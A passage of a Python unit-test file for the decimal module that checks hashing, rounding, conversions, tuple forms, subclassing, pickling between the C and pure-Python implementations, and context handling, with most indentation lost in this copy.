Decimal = self.decimal.Decimal
d = Decimal('43.24')
c = copy.copy(d)
self.assertEqual(id(c), id(d))
dc = copy.deepcopy(d)
self.assertEqual(id(dc), id(d))
def test_hash_method(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
def hashit(d):
a = hash(d)
b = d.__hash__()
self.assertEqual(a, b)
return a
#just that it's hashable
hashit(Decimal(23))
hashit(Decimal('Infinity'))
hashit(Decimal('-Infinity'))
hashit(Decimal('nan123'))
hashit(Decimal('-NaN'))
test_values = [Decimal(sign*(2**m + n))
for m in [0, 14, 15, 16, 17, 30, 31,
32, 33, 61, 62, 63, 64, 65, 66]
for n in range(-10, 10)
for sign in [-1, 1]]
test_values.extend([
Decimal("-1"), # ==> -2
Decimal("-0"), # zeros
Decimal("0.00"),
Decimal("-0.000"),
Decimal("0E10"),
Decimal("-0E12"),
Decimal("10.0"), # negative exponent
Decimal("-23.00000"),
Decimal("1230E100"), # positive exponent
Decimal("-4.5678E50"),
# a value for which hash(n) != hash(n % (2**64-1))
# in Python pre-2.6
Decimal(2**64 + 2**32 - 1),
# selection of values which fail with the old (before
# version 2.6) long.__hash__
Decimal("1.634E100"),
Decimal("90.697E100"),
Decimal("188.83E100"),
Decimal("1652.9E100"),
Decimal("56531E100"),
])
# check that hash(d) == hash(int(d)) for integral values
for value in test_values:
self.assertEqual(hashit(value), hashit(int(value)))
        # the same hash as an int
self.assertEqual(hashit(Decimal(23)), hashit(23))
self.assertRaises(TypeError, hash, Decimal('sNaN'))
self.assertTrue(hashit(Decimal('Inf')))
self.assertTrue(hashit(Decimal('-Inf')))
# check that the hashes of a Decimal float match when they
# represent exactly the same values
test_strings = ['inf', '-Inf', '0.0', '-.0e1',
'34.0', '2.5', '112390.625', '-0.515625']
for s in test_strings:
f = float(s)
d = Decimal(s)
self.assertEqual(hashit(f), hashit(d))
with localcontext() as c:
# check that the value of the hash doesn't depend on the
# current context (issue #1757)
x = Decimal("123456789.1")
c.prec = 6
h1 = hashit(x)
c.prec = 10
h2 = hashit(x)
c.prec = 16
h3 = hashit(x)
self.assertEqual(h1, h2)
self.assertEqual(h1, h3)
c.prec = 10000
x = 1100 ** 1248
self.assertEqual(hashit(Decimal(x)), hashit(x))
def test_min_and_max_methods(self):
Decimal = self.decimal.Decimal
d1 = Decimal('15.32')
d2 = Decimal('28.5')
l1 = 15
l2 = 28
#between Decimals
self.assertIs(min(d1,d2), d1)
self.assertIs(min(d2,d1), d1)
self.assertIs(max(d1,d2), d2)
self.assertIs(max(d2,d1), d2)
#between Decimal and int
self.assertIs(min(d1,l2), d1)
self.assertIs(min(l2,d1), d1)
self.assertIs(max(l1,d2), d2)
self.assertIs(max(d2,l1), d2)
def test_as_nonzero(self):
Decimal = self.decimal.Decimal
#as false
self.assertFalse(Decimal(0))
#as true
self.assertTrue(Decimal('0.372'))
def test_tostring_methods(self):
#Test str and repr methods.
Decimal = self.decimal.Decimal
d = Decimal('15.32')
self.assertEqual(str(d), '15.32') # str
self.assertEqual(repr(d), "Decimal('15.32')") # repr
def test_tonum_methods(self):
#Test float and int methods.
Decimal = self.decimal.Decimal
d1 = Decimal('66')
d2 = Decimal('15.32')
#int
self.assertEqual(int(d1), 66)
self.assertEqual(int(d2), 15)
#float
self.assertEqual(float(d1), 66)
self.assertEqual(float(d2), 15.32)
#floor
test_pairs = [
('123.00', 123),
('3.2', 3),
('3.54', 3),
('3.899', 3),
('-2.3', -3),
('-11.0', -11),
('0.0', 0),
('-0E3', 0),
('89891211712379812736.1', 89891211712379812736),
]
for d, i in test_pairs:
self.assertEqual(math.floor(Decimal(d)), i)
self.assertRaises(ValueError, math.floor, Decimal('-NaN'))
self.assertRaises(ValueError, math.floor, Decimal('sNaN'))
self.assertRaises(ValueError, math.floor, Decimal('NaN123'))
self.assertRaises(OverflowError, math.floor, Decimal('Inf'))
self.assertRaises(OverflowError, math.floor, Decimal('-Inf'))
#ceiling
test_pairs = [
('123.00', 123),
('3.2', 4),
('3.54', 4),
('3.899', 4),
('-2.3', -2),
('-11.0', -11),
('0.0', 0),
('-0E3', 0),
('89891211712379812736.1', 89891211712379812737),
]
for d, i in test_pairs:
self.assertEqual(math.ceil(Decimal(d)), i)
self.assertRaises(ValueError, math.ceil, Decimal('-NaN'))
self.assertRaises(ValueError, math.ceil, Decimal('sNaN'))
self.assertRaises(ValueError, math.ceil, Decimal('NaN123'))
self.assertRaises(OverflowError, math.ceil, Decimal('Inf'))
self.assertRaises(OverflowError, math.ceil, Decimal('-Inf'))
#round, single argument
test_pairs = [
('123.00', 123),
('3.2', 3),
('3.54', 4),
('3.899', 4),
('-2.3', -2),
('-11.0', -11),
('0.0', 0),
('-0E3', 0),
('-3.5', -4),
('-2.5', -2),
('-1.5', -2),
('-0.5', 0),
('0.5', 0),
('1.5', 2),
('2.5', 2),
('3.5', 4),
]
for d, i in test_pairs:
self.assertEqual(round(Decimal(d)), i)
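        # With a single argument, Decimal.__round__ rounds ties to the nearest
        # even integer (banker's rounding), which is why 1.5 and 2.5 both map
        # to 2 in the pairs above.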
self.assertRaises(ValueError, round, Decimal('-NaN'))
self.assertRaises(ValueError, round, Decimal('sNaN'))
self.assertRaises(ValueError, round, Decimal('NaN123'))
self.assertRaises(OverflowError, round, Decimal('Inf'))
self.assertRaises(OverflowError, round, Decimal('-Inf'))
#round, two arguments; this is essentially equivalent
#to quantize, which is already extensively tested
test_triples = [
('123.456', -4, '0E+4'),
('123.456', -3, '0E+3'),
('123.456', -2, '1E+2'),
('123.456', -1, '1.2E+2'),
('123.456', 0, '123'),
('123.456', 1, '123.5'),
('123.456', 2, '123.46'),
('123.456', 3, '123.456'),
('123.456', 4, '123.4560'),
('123.455', 2, '123.46'),
('123.445', 2, '123.44'),
('Inf', 4, 'NaN'),
('-Inf', -23, 'NaN'),
('sNaN314', 3, 'NaN314'),
]
for d, n, r in test_triples:
self.assertEqual(str(round(Decimal(d), n)), r)
def test_nan_to_float(self):
# Test conversions of decimal NANs to float.
# See http://bugs.python.org/issue15544
Decimal = self.decimal.Decimal
for s in ('nan', 'nan1234', '-nan', '-nan2468'):
f = float(Decimal(s))
self.assertTrue(math.isnan(f))
sign = math.copysign(1.0, f)
self.assertEqual(sign, -1.0 if s.startswith('-') else 1.0)
def test_snan_to_float(self):
Decimal = self.decimal.Decimal
for s in ('snan', '-snan', 'snan1357', '-snan1234'):
d = Decimal(s)
self.assertRaises(ValueError, float, d)
def test_eval_round_trip(self):
Decimal = self.decimal.Decimal
#with zero
d = Decimal( (0, (0,), 0) )
self.assertEqual(d, eval(repr(d)))
#int
d = Decimal( (1, (4, 5), 0) )
self.assertEqual(d, eval(repr(d)))
#float
d = Decimal( (0, (4, 5, 3, 4), -2) )
self.assertEqual(d, eval(repr(d)))
#weird
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(d, eval(repr(d)))
def test_as_tuple(self):
Decimal = self.decimal.Decimal
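        # as_tuple() returns DecimalTuple(sign, digits, exponent): sign is 0
        # for positive and 1 for negative, digits is the coefficient as a
        # tuple of ints, and exponent is an int (or 'n'/'N'/'F' for
        # NaN/sNaN/Infinity).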
#with zero
d = Decimal(0)
self.assertEqual(d.as_tuple(), (0, (0,), 0) )
#int
d = Decimal(-45)
self.assertEqual(d.as_tuple(), (1, (4, 5), 0) )
#complicated string
d = Decimal("-4.34913534E-17")
self.assertEqual(d.as_tuple(), (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
# The '0' coefficient is implementation specific to decimal.py.
# It has no meaning in the C-version and is ignored there.
d = Decimal("Infinity")
self.assertEqual(d.as_tuple(), (0, (0,), 'F') )
#leading zeros in coefficient should be stripped
d = Decimal( (0, (0, 0, 4, 0, 5, 3, 4), -2) )
self.assertEqual(d.as_tuple(), (0, (4, 0, 5, 3, 4), -2) )
d = Decimal( (1, (0, 0, 0), 37) )
self.assertEqual(d.as_tuple(), (1, (0,), 37))
d = Decimal( (1, (), 37) )
self.assertEqual(d.as_tuple(), (1, (0,), 37))
#leading zeros in NaN diagnostic info should be stripped
d = Decimal( (0, (0, 0, 4, 0, 5, 3, 4), 'n') )
self.assertEqual(d.as_tuple(), (0, (4, 0, 5, 3, 4), 'n') )
d = Decimal( (1, (0, 0, 0), 'N') )
self.assertEqual(d.as_tuple(), (1, (), 'N') )
d = Decimal( (1, (), 'n') )
self.assertEqual(d.as_tuple(), (1, (), 'n') )
# For infinities, decimal.py has always silently accepted any
# coefficient tuple.
d = Decimal( (0, (0,), 'F') )
self.assertEqual(d.as_tuple(), (0, (0,), 'F'))
d = Decimal( (0, (4, 5, 3, 4), 'F') )
self.assertEqual(d.as_tuple(), (0, (0,), 'F'))
d = Decimal( (1, (0, 2, 7, 1), 'F') )
self.assertEqual(d.as_tuple(), (1, (0,), 'F'))
def test_subclassing(self):
# Different behaviours when subclassing Decimal
Decimal = self.decimal.Decimal
class MyDecimal(Decimal):
y = None
d1 = MyDecimal(1)
d2 = MyDecimal(2)
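        # Arithmetic and Decimal methods return plain Decimal instances, while
        # copy.copy/copy.deepcopy preserve the subclass; constructing one type
        # from an instance of the other never carries extra attributes across.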
d = d1 + d2
self.assertIs(type(d), Decimal)
d = d1.max(d2)
self.assertIs(type(d), Decimal)
d = copy.copy(d1)
self.assertIs(type(d), MyDecimal)
self.assertEqual(d, d1)
d = copy.deepcopy(d1)
self.assertIs(type(d), MyDecimal)
self.assertEqual(d, d1)
# Decimal(Decimal)
d = Decimal('1.0')
x = Decimal(d)
self.assertIs(type(x), Decimal)
self.assertEqual(x, d)
# MyDecimal(Decimal)
m = MyDecimal(d)
self.assertIs(type(m), MyDecimal)
self.assertEqual(m, d)
self.assertIs(m.y, None)
# Decimal(MyDecimal)
x = Decimal(m)
self.assertIs(type(x), Decimal)
self.assertEqual(x, d)
# MyDecimal(MyDecimal)
m.y = 9
x = MyDecimal(m)
self.assertIs(type(x), MyDecimal)
self.assertEqual(x, d)
self.assertIs(x.y, None)
def test_implicit_context(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
# Check results when context given implicitly. (Issue 2478)
c = getcontext()
self.assertEqual(str(Decimal(0).sqrt()),
str(c.sqrt(Decimal(0))))
def test_none_args(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
Underflow = self.decimal.Underflow
Subnormal = self.decimal.Subnormal
Inexact = self.decimal.Inexact
Rounded = self.decimal.Rounded
Clamped = self.decimal.Clamped
with localcontext(Context()) as c:
c.prec = 7
c.Emax = 999
c.Emin = -999
x = Decimal("111")
y = Decimal("1e9999")
z = Decimal("1e-9999")
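            # Passing context=None is the same as omitting the argument: the
            # operation uses the current context, so all flags land on the
            # local context c.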
##### Unary functions
c.clear_flags()
self.assertEqual(str(x.exp(context=None)), '1.609487E+48')
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
c.clear_flags()
self.assertRaises(Overflow, y.exp, context=None)
self.assertTrue(c.flags[Overflow])
self.assertIs(z.is_normal(context=None), False)
self.assertIs(z.is_subnormal(context=None), True)
c.clear_flags()
self.assertEqual(str(x.ln(context=None)), '4.709530')
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal(-1).ln, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(x.log10(context=None)), '2.045323')
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal(-1).log10, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(x.logb(context=None)), '2')
self.assertRaises(DivisionByZero, Decimal(0).logb, context=None)
self.assertTrue(c.flags[DivisionByZero])
c.clear_flags()
self.assertEqual(str(x.logical_invert(context=None)), '1111000')
self.assertRaises(InvalidOperation, y.logical_invert, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(y.next_minus(context=None)), '9.999999E+999')
self.assertRaises(InvalidOperation, Decimal('sNaN').next_minus, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(y.next_plus(context=None)), 'Infinity')
self.assertRaises(InvalidOperation, Decimal('sNaN').next_plus, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(z.normalize(context=None)), '0')
self.assertRaises(Overflow, y.normalize, context=None)
self.assertTrue(c.flags[Overflow])
self.assertEqual(str(z.number_class(context=None)), '+Subnormal')
c.clear_flags()
self.assertEqual(str(z.sqrt(context=None)), '0E-1005')
self.assertTrue(c.flags[Clamped])
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
self.assertTrue(c.flags[Subnormal])
self.assertTrue(c.flags[Underflow])
c.clear_flags()
self.assertRaises(Overflow, y.sqrt, context=None)
self.assertTrue(c.flags[Overflow])
c.capitals = 0
self.assertEqual(str(z.to_eng_string(context=None)), '1e-9999')
c.capitals = 1
##### Binary functions
c.clear_flags()
ans = str(x.compare(Decimal('Nan891287828'), context=None))
self.assertEqual(ans, 'NaN1287828')
self.assertRaises(InvalidOperation, x.compare, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.compare_signal(8224, context=None))
self.assertEqual(ans, '-1')
self.assertRaises(InvalidOperation, x.compare_signal, Decimal('NaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.logical_and(101, context=None))
self.assertEqual(ans, '101')
self.assertRaises(InvalidOperation, x.logical_and, 123, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.logical_or(101, context=None))
self.assertEqual(ans, '111')
self.assertRaises(InvalidOperation, x.logical_or, 123, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.logical_xor(101, context=None))
self.assertEqual(ans, '10')
self.assertRaises(InvalidOperation, x.logical_xor, 123, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.max(101, context=None))
self.assertEqual(ans, '111')
self.assertRaises(InvalidOperation, x.max, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.max_mag(101, context=None))
self.assertEqual(ans, '111')
self.assertRaises(InvalidOperation, x.max_mag, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.min(101, context=None))
self.assertEqual(ans, '101')
self.assertRaises(InvalidOperation, x.min, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.min_mag(101, context=None))
self.assertEqual(ans, '101')
self.assertRaises(InvalidOperation, x.min_mag, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.remainder_near(101, context=None))
self.assertEqual(ans, '10')
self.assertRaises(InvalidOperation, y.remainder_near, 101, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.rotate(2, context=None))
self.assertEqual(ans, '11100')
self.assertRaises(InvalidOperation, x.rotate, 101, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.scaleb(7, context=None))
self.assertEqual(ans, '1.11E+9')
self.assertRaises(InvalidOperation, x.scaleb, 10000, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.shift(2, context=None))
self.assertEqual(ans, '11100')
self.assertRaises(InvalidOperation, x.shift, 10000, context=None)
self.assertTrue(c.flags[InvalidOperation])
##### Ternary functions
c.clear_flags()
ans = str(x.fma(2, 3, context=None))
self.assertEqual(ans, '225')
self.assertRaises(Overflow, x.fma, Decimal('1e9999'), 3, context=None)
self.assertTrue(c.flags[Overflow])
##### Special cases
c.rounding = ROUND_HALF_EVEN
ans = str(Decimal('1.5').to_integral(rounding=None, context=None))
self.assertEqual(ans, '2')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.5').to_integral(rounding=None, context=None))
self.assertEqual(ans, '1')
ans = str(Decimal('1.5').to_integral(rounding=ROUND_UP, context=None))
self.assertEqual(ans, '2')
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.rounding = ROUND_HALF_EVEN
ans = str(Decimal('1.5').to_integral_value(rounding=None, context=None))
self.assertEqual(ans, '2')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.5').to_integral_value(rounding=None, context=None))
self.assertEqual(ans, '1')
ans = str(Decimal('1.5').to_integral_value(rounding=ROUND_UP, context=None))
self.assertEqual(ans, '2')
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral_value, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.rounding = ROUND_HALF_EVEN
ans = str(Decimal('1.5').to_integral_exact(rounding=None, context=None))
self.assertEqual(ans, '2')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.5').to_integral_exact(rounding=None, context=None))
self.assertEqual(ans, '1')
ans = str(Decimal('1.5').to_integral_exact(rounding=ROUND_UP, context=None))
self.assertEqual(ans, '2')
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral_exact, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.rounding = ROUND_UP
ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=None, context=None))
self.assertEqual(ans, '1.501')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=None, context=None))
self.assertEqual(ans, '1.500')
ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=ROUND_UP, context=None))
self.assertEqual(ans, '1.501')
c.clear_flags()
self.assertRaises(InvalidOperation, y.quantize, Decimal('1e-10'), rounding=ROUND_UP, context=None)
self.assertTrue(c.flags[InvalidOperation])
with localcontext(Context()) as context:
context.prec = 7
context.Emax = 999
context.Emin = -999
with localcontext(ctx=None) as c:
self.assertEqual(c.prec, 7)
self.assertEqual(c.Emax, 999)
self.assertEqual(c.Emin, -999)
def test_conversions_from_int(self):
# Check that methods taking a second Decimal argument will
# always accept an integer in place of a Decimal.
Decimal = self.decimal.Decimal
self.assertEqual(Decimal(4).compare(3),
Decimal(4).compare(Decimal(3)))
self.assertEqual(Decimal(4).compare_signal(3),
Decimal(4).compare_signal(Decimal(3)))
self.assertEqual(Decimal(4).compare_total(3),
Decimal(4).compare_total(Decimal(3)))
self.assertEqual(Decimal(4).compare_total_mag(3),
Decimal(4).compare_total_mag(Decimal(3)))
self.assertEqual(Decimal(10101).logical_and(1001),
Decimal(10101).logical_and(Decimal(1001)))
self.assertEqual(Decimal(10101).logical_or(1001),
Decimal(10101).logical_or(Decimal(1001)))
self.assertEqual(Decimal(10101).logical_xor(1001),
Decimal(10101).logical_xor(Decimal(1001)))
self.assertEqual(Decimal(567).max(123),
Decimal(567).max(Decimal(123)))
self.assertEqual(Decimal(567).max_mag(123),
Decimal(567).max_mag(Decimal(123)))
self.assertEqual(Decimal(567).min(123),
Decimal(567).min(Decimal(123)))
self.assertEqual(Decimal(567).min_mag(123),
Decimal(567).min_mag(Decimal(123)))
self.assertEqual(Decimal(567).next_toward(123),
Decimal(567).next_toward(Decimal(123)))
self.assertEqual(Decimal(1234).quantize(100),
Decimal(1234).quantize(Decimal(100)))
self.assertEqual(Decimal(768).remainder_near(1234),
Decimal(768).remainder_near(Decimal(1234)))
self.assertEqual(Decimal(123).rotate(1),
Decimal(123).rotate(Decimal(1)))
self.assertEqual(Decimal(1234).same_quantum(1000),
Decimal(1234).same_quantum(Decimal(1000)))
self.assertEqual(Decimal('9.123').scaleb(-100),
Decimal('9.123').scaleb(Decimal(-100)))
self.assertEqual(Decimal(456).shift(-1),
Decimal(456).shift(Decimal(-1)))
self.assertEqual(Decimal(-12).fma(Decimal(45), 67),
Decimal(-12).fma(Decimal(45), Decimal(67)))
self.assertEqual(Decimal(-12).fma(45, 67),
Decimal(-12).fma(Decimal(45), Decimal(67)))
self.assertEqual(Decimal(-12).fma(45, Decimal(67)),
Decimal(-12).fma(Decimal(45), Decimal(67)))
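# C and P denote the C-accelerated (_decimal) and pure-Python (_pydecimal)
# implementations of the decimal module; each test class is run once against
# each implementation via these thin subclasses.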
class CUsabilityTest(UsabilityTest):
decimal = C
class PyUsabilityTest(UsabilityTest):
decimal = P
class PythonAPItests(unittest.TestCase):
def test_abc(self):
Decimal = self.decimal.Decimal
self.assertTrue(issubclass(Decimal, numbers.Number))
self.assertFalse(issubclass(Decimal, numbers.Real))
self.assertIsInstance(Decimal(0), numbers.Number)
self.assertNotIsInstance(Decimal(0), numbers.Real)
def test_pickle(self):
Decimal = self.decimal.Decimal
savedecimal = sys.modules['decimal']
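        # pickle records the module name 'decimal', so sys.modules['decimal']
        # is swapped temporarily to control which implementation performs the
        # dump and the load.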
# Round trip
sys.modules['decimal'] = self.decimal
d = Decimal('-3.141590000')
p = pickle.dumps(d)
e = pickle.loads(p)
self.assertEqual(d, e)
if C:
# Test interchangeability
x = C.Decimal('-3.123e81723')
y = P.Decimal('-3.123e81723')
sys.modules['decimal'] = C
sx = pickle.dumps(x)
sys.modules['decimal'] = P
r = pickle.loads(sx)
self.assertIsInstance(r, P.Decimal)
self.assertEqual(r, y)
sys.modules['decimal'] = P
sy = pickle.dumps(y)
sys.modules['decimal'] = C
r = pickle.loads(sy)
self.assertIsInstance(r, C.Decimal)
self.assertEqual(r, x)
sys.modules['decimal'] = savedecimal
def test_int(self):
Decimal = self.decimal.Decimal
for x in range(-250, 250):
s = '%0.2f' % (x / 100.0)
# should work the same as for floats
self.assertEqual(int(Decimal(s)), int(float(s)))
# should work the same as to_integral in the ROUND_DOWN mode
d = Decimal(s)
r = d.to_integral(ROUND_DOWN)
self.assertEqual(Decimal(int(d)), r)
self.assertRaises(ValueError, int, Decimal('-nan'))
self.assertRaises(ValueError, int, Decimal('snan'))
self.assertRaises(OverflowError, int, Decimal('inf'))
self.assertRaises(OverflowError, int, Decimal('-inf'))
def test_trunc(self):
Decimal = self.decimal.Decimal
for x in range(-250, 250):
s = '%0.2f' % (x / 100.0)
# should work the same as for floats
self.assertEqual(int(Decimal(s)), int(float(s)))
# should work the same as to_integral in the ROUND_DOWN mode
d = Decimal(s)
r = d.to_integral(ROUND_DOWN)
self.assertEqual(Decimal(math.trunc(d)), r)
def test_from_float(self):
Decimal = self.decimal.Decimal
class MyDecimal(Decimal):
pass
self.assertTrue(issubclass(MyDecimal, Decimal))
r = MyDecimal.from_float(0.1)
self.assertEqual(type(r), MyDecimal)
self.assertEqual(str(r),
'0.1000000000000000055511151231257827021181583404541015625')
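        # from_float() converts the binary float exactly, without rounding,
        # which is why 0.1 expands to the 55-digit value above.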
bigint = 12345678901234567890123456789
self.assertEqual(MyDecimal.from_float(bigint), MyDecimal(bigint))
self.assertTrue(MyDecimal.from_float(float('nan')).is_qnan())
self.assertTrue(MyDecimal.from_float(float('inf')).is_infinite())
self.assertTrue(MyDecimal.from_float(float('-inf')).is_infinite())
self.assertEqual(str(MyDecimal.from_float(float('nan'))),
str(Decimal('NaN')))
self.assertEqual(str(MyDecimal.from_float(float('inf'))),
str(Decimal('Infinity')))
self.assertEqual(str(MyDecimal.from_float(float('-inf'))),
str(Decimal('-Infinity')))
self.assertRaises(TypeError, MyDecimal.from_float, 'abc')
for i in range(200):
x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
self.assertEqual(x, float(MyDecimal.from_float(x))) # roundtrip
def test_create_decimal_from_float(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
Inexact = self.decimal.Inexact
context = Context(prec=5, rounding=ROUND_DOWN)
self.assertEqual(
context.create_decimal_from_float(math.pi),
Decimal('3.1415')
)
context = Context(prec=5, rounding=ROUND_UP)
self.assertEqual(
context.create_decimal_from_float(math.pi),
Decimal('3.1416')
)
context = Context(prec=5, traps=[Inexact])
self.assertRaises(
Inexact,
context.create_decimal_from_float,
math.pi
)
self.assertEqual(repr(context.create_decimal_from_float(-0.0)),
"Decimal('-0')")
self.assertEqual(repr(context.create_decimal_from_float(1.0)),
"Decimal('1')")
self.assertEqual(repr(context.create_decimal_from_float(10)),
"Decimal('10')")
def test_quantize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
InvalidOperation = self.decimal.InvalidOperation
c = Context(Emax=99999, Emin=-99999)
self.assertEqual(
Decimal('7.335').quantize(Decimal('.01')),
Decimal('7.34')
)
self.assertEqual(
Decimal('7.335').quantize(Decimal('.01'), rounding=ROUND_DOWN),
Decimal('7.33')
)
self.assertRaises(
InvalidOperation,
Decimal("10e99999").quantize, Decimal('1e100000'), context=c
)
c = Context()
d = Decimal("0.871831e800")
x = d.quantize(context=c, exp=Decimal("1e797"), rounding=ROUND_DOWN)
self.assertEqual(x, Decimal('8.71E+799'))
def test_complex(self):
Decimal = self.decimal.Decimal
x = Decimal("9.8182731e181273")
self.assertEqual(x.real, x)
self.assertEqual(x.imag, 0)
self.assertEqual(x.conjugate(), x)
x = Decimal("1")
self.assertEqual(complex(x), complex(float(1)))
self.assertRaises(AttributeError, setattr, x, 'real', 100)
self.assertRaises(AttributeError, setattr, x, 'imag', 100)
self.assertRaises(AttributeError, setattr, x, 'conjugate', 100)
self.assertRaises(AttributeError, setattr, x, '__complex__', 100)
def test_named_parameters(self):
D = self.decimal.Decimal
Context = self.decimal.Context
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
Overflow = self.decimal.Overflow
xc = Context()
xc.prec = 1
xc.Emax = 1
xc.Emin = -1
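        # xc is deliberately tiny (one digit of precision, exponents limited
        # to [-1, 1]) so that rounding, overflow and subnormal behaviour are
        # easy to trigger in the assertions below.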
with localcontext() as c:
c.clear_flags()
self.assertEqual(D(9, xc), 9)
self.assertEqual(D(9, context=xc), 9)
self.assertEqual(D(context=xc, value=9), 9)
self.assertEqual(D(context=xc), 0)
xc.clear_flags()
self.assertRaises(InvalidOperation, D, "xyz", context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
xc.clear_flags()
self.assertEqual(D(2).exp(context=xc), 7)
self.assertRaises(Overflow, D(8).exp, context=xc)
self.assertTrue(xc.flags[Overflow])
self.assertFalse(c.flags[Overflow])
xc.clear_flags()
self.assertEqual(D(2).ln(context=xc), D('0.7'))
self.assertRaises(InvalidOperation, D(-1).ln, context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
self.assertEqual(D(0).log10(context=xc), D('-inf'))
self.assertEqual(D(-1).next_minus(context=xc), -2)
self.assertEqual(D(-1).next_plus(context=xc), D('-0.9'))
self.assertEqual(D("9.73").normalize(context=xc), D('1E+1'))
self.assertEqual(D("9999").to_integral(context=xc), 9999)
self.assertEqual(D("-2000").to_integral_exact(context=xc), -2000)
self.assertEqual(D("123").to_integral_value(context=xc), 123)
self.assertEqual(D("0.0625").sqrt(context=xc), D('0.2'))
self.assertEqual(D("0.0625").compare(context=xc, other=3), -1)
xc.clear_flags()
self.assertRaises(InvalidOperation,
D("0").compare_signal, D('nan'), context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
self.assertEqual(D("0.01").max(D('0.0101'), context=xc), D('0.0'))
self.assertEqual(D("0.2").max_mag(D('-0.3'), context=xc),
D('-0.3'))
self.assertEqual(D("0.02").min(D('-0.03'), context=xc), D('-0.0'))
self.assertEqual(D("0.02").min_mag(D('-0.03'), context=xc),
D('0.0'))
self.assertEqual(D("0.2").next_toward(D('-1'), context=xc), D('0.1'))
xc.clear_flags()
self.assertRaises(InvalidOperation,
D("0.2").quantize, D('1e10'), context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
self.assertEqual(D("9.99").remainder_near(D('1.5'), context=xc),
D('-0.5'))
self.assertEqual(D("9.9").fma(third=D('0.9'), context=xc, other=7),
D('7E+1'))
self.assertRaises(TypeError, D(1).is_canonical, context=xc)
self.assertRaises(TypeError, D(1).is_finite, context=xc)
self.assertRaises(TypeError, D(1).is_infinite, context=xc)
self.assertRaises(TypeError, D(1).is_nan, context=xc)
self.assertRaises(TypeError, D(1).is_qnan, context=xc)
self.assertRaises(TypeError, D(1).is_snan, context=xc)
self.assertRaises(TypeError, D(1).is_signed, context=xc)
self.assertRaises(TypeError, D(1).is_zero, context=xc)
self.assertFalse(D("0.01").is_normal(context=xc))
self.assertTrue(D("0.01").is_subnormal(context=xc))
self.assertRaises(TypeError, D(1).adjusted, context=xc)
self.assertRaises(TypeError, D(1).conjugate, context=xc)
self.assertRaises(TypeError, D(1).radix, context=xc)
self.assertEqual(D(-111).logb(context=xc), 2)
self.assertEqual(D(0).logical_invert(context=xc), 1)
self.assertEqual(D('0.01').number_class(context=xc), '+Subnormal')
self.assertEqual(D('0.21').to_eng_string(context=xc), '0.21')
self.assertEqual(D('11').logical_and(D('10'), context=xc), 0)
self.assertEqual(D('11').logical_or(D('10'), context=xc), 1)
self.assertEqual(D('01').logical_xor(D('10'), context=xc), 1)
self.assertEqual(D('23').rotate(1, context=xc), 3)
xc.clear_flags()
self.assertRaises(Overflow,
D('23').scaleb, 1, context=xc)
self.assertTrue(xc.flags[Overflow])
self.assertFalse(c.flags[Overflow])
self.assertEqual(D('23').shift(-1, context=xc), 0)
self.assertRaises(TypeError, D.from_float, 1.1, context=xc)
